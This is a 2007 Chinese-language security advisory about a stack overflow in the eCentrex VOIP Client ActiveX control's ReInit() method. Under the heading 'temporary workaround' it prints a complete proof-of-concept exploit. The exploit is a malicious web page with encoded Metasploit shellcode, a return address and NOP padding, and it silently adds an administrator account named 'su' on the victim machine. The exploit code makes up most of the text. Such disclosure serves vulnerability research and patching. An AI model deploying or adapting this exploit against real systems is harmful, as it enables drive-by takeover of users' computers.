【绿盟科技授权,赛迪发布,谢绝任何网站转载,违者,赛迪网将保留追究其法律责任的权利!】
发布日期:2007-08-21
更新日期:2007-08-24
受影响系统:
eCentrex VOIP Client ActiveX 2.0.1
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 25383
eCentrex VOIP Client是一款网络电话客户端软件。
eCentrex VOIP Client的ActiveX控件实现上存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞控制用户系统。
eCentrex SIP UA Com模块(euacom.dll)在处理传送给eCentrex VOIP Client组件ActiveX控件(uacomx.ocx)的ReInit()方式的超长参数时存在栈溢出漏洞,如果用户受骗访问了恶意网页,就可能触发这个溢出,导致执行任意指令。
<*来源:rgod (rgod@autistici.org)
链接:http://secunia.com/advisories/26525/
*>
建议:
--------------------------------------------------------------------------------
临时解决方法:
<html>
<object classid='clsid:BD80D375-5439-4D80-B128-DDA5FDC3AE6C' id='IUAComFormX' /></object>
<script language='vbscript'>
'metasploit one, 456 bytes - cmd /c net user su tzu /add & net localgroup Administrators su /add
scode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49%37%49%49%49%49%49%49%
49%49%49%49%49%51%5a%6a%44%58%50%30%41%30%41%6b%41%41%54%42%41%32%41%41%32%42%41%30%42%41%
58%38%41%42%50%75%68%69%39%6c%38%68%31%54%43%30%47%70%57%70%4c%4b%30%45%77%4c%6e%6b%31%6c%
47%75%51%68%43%31%48%6f%6c%4b%52%6f%75%48%4c%4b%63%6f%31%30%53%31%38%6b%71%59%6c%4b%36%54%
6c%4b%47%71%48%6e%64%71%4f%30%4d%49%6c%6c%4e%64%4b%70%30%74%76%67%4a%61%39%5a%76%6d%55%51%
6b%72%4a%4b%68%74%47%4b%70%54%35%74%55%54%61%65%6b%55%6c%4b%41%4f%77%54%34%41%48%6b%71%76%
6e%6b%46%6c%62%6b%6e%6b%33%6f%77%6c%54%41%68%6b%6e%6b%57%6c%6c%4b%46%61%48%6b%4f%79%61%4c%
71%34%56%64%48%43%54%71%4b%70%31%74%4c%4b%37%30%46%50%4f%75%4f%30%41%68%46%6c%6e%6b%43%70%
46%6c%6c%4b%30%70%35%4c%6e%4d%4e%6b%50%68%35%58%68%6b%56%69%6c%4b%4b%30%6e%50%57%70%53%30%
73%30%4e%6b%62%48%67%4c%43%6f%50%31%4a%56%51%70%36%36%6d%59%58%78%6d%53%49%50%33%4b%56%30%
42%48%41%6e%58%58%6d%32%70%73%41%78%6f%68%69%6e%6f%7a%54%4e%42%77%49%6f%38%67%33%53%30%6d%
75%34%41%30%66%4f%70%63%65%70%52%4e%43%55%31%64%31%30%74%35%33%43%63%55%51%62%31%30%51%63%
41%65%47%50%32%54%30%7a%42%55%61%30%36%4f%30%61%43%54%71%74%35%70%57%56%65%70%70%6e%61%75%
52%54%45%70%32%4c%70%6f%70%63%73%51%72%4c%32%47%54%32%32%4f%42%55%30%70%55%70%71%51%65%34%
32%4d%62%49%50%6e%42%49%74%33%62%54%43%42%30%61%42%54%70%6f%50%72%41%63%67%50%51%63%34%35%
77%50%66%4f%32%41%61%74%71%74%35%50%44")
'try this kind of command: msfpescan -d ./tools/iexplore -x "\x00\x13\x41\x00"
esi = unescape("%65%1a%2f%7e") '0x7e2f1a65 -> 0x00134200 - jumpin' in the middle of pad...
l_pad = Replace( Space(2555), " ", unescape("%1b%27%3f%7e") )' 0x7e3f272b -> 0x00137000 -
jumping to ultranop, worked 100%, you really need javashit spray every time?
l_nop = string(12222,unescape("%90"))
UserName = String(164,"A") + esi + l_pad + l_nop + scode
Password = ""
ProxyServerIP = ""
ProxyIP = ""
Project = ""
PortNo = 1
IUAComFormX.ReInit UserName ,Password ,ProxyServerIP ,ProxyIP ,Project ,PortNo
</script>
</html>
|
厂商补丁:
eCentrex
--------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:http://www.e800phone.com/abtus.htm(责任编辑:李磊)
